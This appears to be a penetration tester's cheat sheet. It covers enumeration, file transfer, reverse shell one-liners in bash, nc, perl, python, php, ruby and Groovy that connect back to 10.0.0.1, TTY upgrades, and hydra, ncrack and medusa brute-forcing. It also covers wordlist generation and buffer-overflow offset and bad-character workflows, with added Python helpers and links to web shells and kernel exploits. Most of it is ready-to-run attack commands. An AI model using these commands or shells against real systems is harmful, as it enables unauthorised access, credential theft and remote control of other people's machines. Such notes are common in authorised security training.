Notes

Network enumeration

netdiscover
nbtscan 10.0.1.0/24
nmap -sn 10.0.0.0/16

nmap -p- 10.0.1.150 -sV -O -A

Local enumeration

commands permitted via sudo: sudo -l

listening ports: netstat -lntp

process owning a port: lsof -i:4444

cat /etc/passwd
cat /etc/shadow

determine Windows version: systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

Website
nikto -h http://1.2.3.4
nikto -host $targetip -port $targetport

dirb http://1.2.3.4 <wordlist>
dirbuster
gobuster dir -u http://1.2.3.4 -w <wordlist> -x <extension>,<extension>

dirsearch.py -w <wordlist> -u $targetip -e <extension>

wpscan --url http://1.2.3.4:8080/

Transferring files between machines

NC
Local (receiver): nc -nvlp 4444 > file.txt
Remote (sender): nc -nv 1.2.3.4 4444 < file.txt

php
php -S 0.0.0.0:4444 (bind to all interfaces; localhost:4444 would only serve clients on the same machine)

python
python -m SimpleHTTPServer 4444
python3 -m http.server 4444

wget http://1.2.3.4:4444/file.txt
curl http://1.2.3.4:4444 > file.txt

Reverse shell one-liners

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
nc -e /bin/sh 10.0.0.1 1234
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

ruby -rsocket -e 'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

JAVA (Groovy syntax):
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Upgrading a shell to an interactive TTY

python -c 'import pty; pty.spawn("/bin/sh")'
/bin/sh -i
echo os.system('/bin/bash')

perl -e 'exec "/bin/sh";'
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')

Shell from within applications

IRB: exec "/bin/sh"
VI: :!bash
VI: :set shell=/bin/bash followed by :shell
NMAP (interactive mode): !sh

Brute-force tools

hydra -l root -P password-file.txt 1.2.3.4 ssh
hydra -P password-file 1.2.3.4 snmp

ncrack -vv --user <user> -P password-file.txt rdp://1.2.3.4

medusa -h 1.2.3.4 -u admin -P password-file.txt -M http -m DIR:/admin -T 10

Gathering data from websites

theharvester -d 1-0-1.nl -b google > google.txt

cewl http://www.site.nl > site.txt
cewl --depth 0 -w output.txt https://en.wikipedia.org/wiki/Billy_Madison

python wordcollector.py http://www.site.nl

Creating a wordlist

tr -sc 'A-Za-z' '\n' < input | sort | uniq > output

mp64 bla?a?a (maskprocessor; ?a = any character, ?l ?u ?d ?s = lower / upper / digit / special)

crunch 6 6 0123456789ABCDEF -o crunch1.txt
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha
crunch 8 8 -t ,@@^^%%%
@ = lower case alpha
, = upper case alpha
% = numeric characters
^ = special characters including space
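The placeholder table above, turned into code as an added example (this is not part of the original notes and not crunch's or maskprocessor's own code): it expands a crunch -t pattern or an mp64 mask into candidates and computes the keyspace, which is what you want to know before letting crunch write gigabytes to disk. The symbol set used for ^ / ?s is an assumption; crunch's built-in symbol list may differ.

```python
import itertools
import string

# Assumed symbol set for crunch's '^' and maskprocessor's '?s' (crunch's real list may differ).
SPECIAL = "!@#$%^&*()-_+=~`[]{}|\\:;\"'<>,.?/ "

# crunch -t placeholders, as listed in the notes
CRUNCH_SETS = {
    "@": string.ascii_lowercase,   # lower case alpha
    ",": string.ascii_uppercase,   # upper case alpha
    "%": string.digits,            # numeric characters
    "^": SPECIAL,                  # special characters including space
}

# maskprocessor (mp64) built-in charsets
MASK_SETS = {
    "l": string.ascii_lowercase,
    "u": string.ascii_uppercase,
    "d": string.digits,
    "s": SPECIAL,
    "a": string.ascii_lowercase + string.ascii_uppercase + string.digits + SPECIAL,
}


def pattern_slots(pattern):
    """crunch -t pattern -> list of per-position charsets; unknown chars are literals."""
    return [CRUNCH_SETS.get(c, c) for c in pattern]


def mask_slots(mask):
    """mp64 mask (e.g. 'bla?a?a') -> list of per-position charsets."""
    slots, i = [], 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask) and mask[i + 1] in MASK_SETS:
            slots.append(MASK_SETS[mask[i + 1]])
            i += 2
        else:
            slots.append(mask[i])  # literal character
            i += 1
    return slots


def keyspace(slots):
    """Number of candidates the pattern will produce."""
    n = 1
    for s in slots:
        n *= len(s)
    return n


def expand(slots):
    """Generate the candidates in crunch/mp64 order (leftmost position slowest)."""
    for combo in itertools.product(*slots):
        yield "".join(combo)


if __name__ == "__main__":
    for p in (",@@^^%%%", "bla%%"):
        print(p, keyspace(pattern_slots(p)))
    print("bla?a?a", keyspace(mask_slots("bla?a?a")))
    print(list(itertools.islice(expand(pattern_slots("pa%%")), 5)))
```

Run it before a long crunch job: if keyspace() is in the billions, narrow the pattern or pipe crunch straight into the cracker instead of writing the file.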

Finding the buffer overflow offset

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2700
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 2700 -q 3969443

Python
buffer = "A" * 2606 + "B" * 4 + "C" * 90


Determining bad characters
Send the full byte sequence 0x00 to 0xff after the overwritten return address and inspect it in the debugger: the byte at which the sequence is truncated or altered is a bad character. Remove it, send again and repeat until the whole sequence arrives intact (0x00 is almost always bad because it terminates C strings).
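An added example for the two steps above (pattern offset and bad-character check); it is not part of the original notes and not Metasploit's code. It reimplements the pattern_create / pattern_offset logic in Python, builds the A/B/C buffer, generates the 0x00..0xff sequence minus known bad bytes, and compares what was sent with what the debugger shows. The 2700-byte length, the offset 2606 and the EIP value 39694438 used in the demo are assumed illustrative values, as is the sample memory dump.

```python
import string


def pattern_create(length):
    """Metasploit-style cyclic pattern: Aa0Aa1...Aa9Ab0... (unique 3-byte triples)."""
    seq = "".join(u + l + d
                  for u in string.ascii_uppercase
                  for l in string.ascii_lowercase
                  for d in string.digits)
    if length > len(seq):
        raise ValueError("pattern longer than %d bytes would repeat" % len(seq))
    return seq[:length]


def pattern_offset(length, query):
    """Offset of `query` in the pattern, or None.
    An 8-hex-digit query is treated as the little-endian 32-bit value read from
    EIP (as pattern_offset.rb does); anything else is matched as a literal."""
    pat = pattern_create(length)
    if len(query) == 8 and all(c in string.hexdigits for c in query):
        needle = bytes.fromhex(query)[::-1].decode("ascii", errors="replace")
    else:
        needle = query
    idx = pat.find(needle)
    return None if idx < 0 else idx


def build_buffer(offset, eip=b"B" * 4, payload=b"C" * 90):
    """The notes' 'A'*offset + 'B'*4 + 'C'*90 layout, as bytes."""
    return b"A" * offset + eip + payload


def badchars(exclude=(0x00,)):
    """All bytes 0x00..0xff except those already known to be bad."""
    return bytes(b for b in range(256) if b not in exclude)


def first_corruption(sent, dumped):
    """Compare the bytes sent with the bytes seen in memory; return (index, byte)
    of the first divergence, or None when the sequence arrived intact."""
    for i, b in enumerate(sent):
        if i >= len(dumped) or dumped[i] != b:
            return i, b
    return None


if __name__ == "__main__":
    # Assumed values: EIP showed 39694438 after sending a 2700-byte pattern.
    off = pattern_offset(2700, "39694438")
    print("offset:", off)                      # 2606
    seq = badchars(exclude={0x00})
    # Constructed dump: the target dropped 0x0a (newline), so the rest shifted left.
    dumped = seq.replace(b"\x0a", b"")
    print("first corruption:", first_corruption(seq, dumped))  # (9, 10)
    print(len(build_buffer(off, payload=seq)))
```

Once first_corruption() reports a byte, add it to `exclude`, resend and repeat until it returns None; the final exclude set is what you pass to msfvenom as -b.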

Debugging applications

edb --run <program>


URLs

https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
https://github.com/flozz/p0wny-shell/raw/master/shell.php

https://www.kernel-exploits.com
https://github.com/b374k/b374k/blob/v3.2.3/b374k.min.php
https://highon.coffee/blog/lfi-cheat-sheet/
https://github.com/SecWiki/windows-kernel-exploits
https://github.com/superkojiman/onetwopunch
https://github.com/Ganapati/RsaCtfTool
https://sparta.secforce.com/
https://github.com/maurosoria/dirsearch
http://www.fuzzysecurity.com/tutorials/16.html
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/
https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs
https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/
http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheatsheet
https://www.perspectiverisk.com/mysql-sql-injection-practical-cheat-sheet/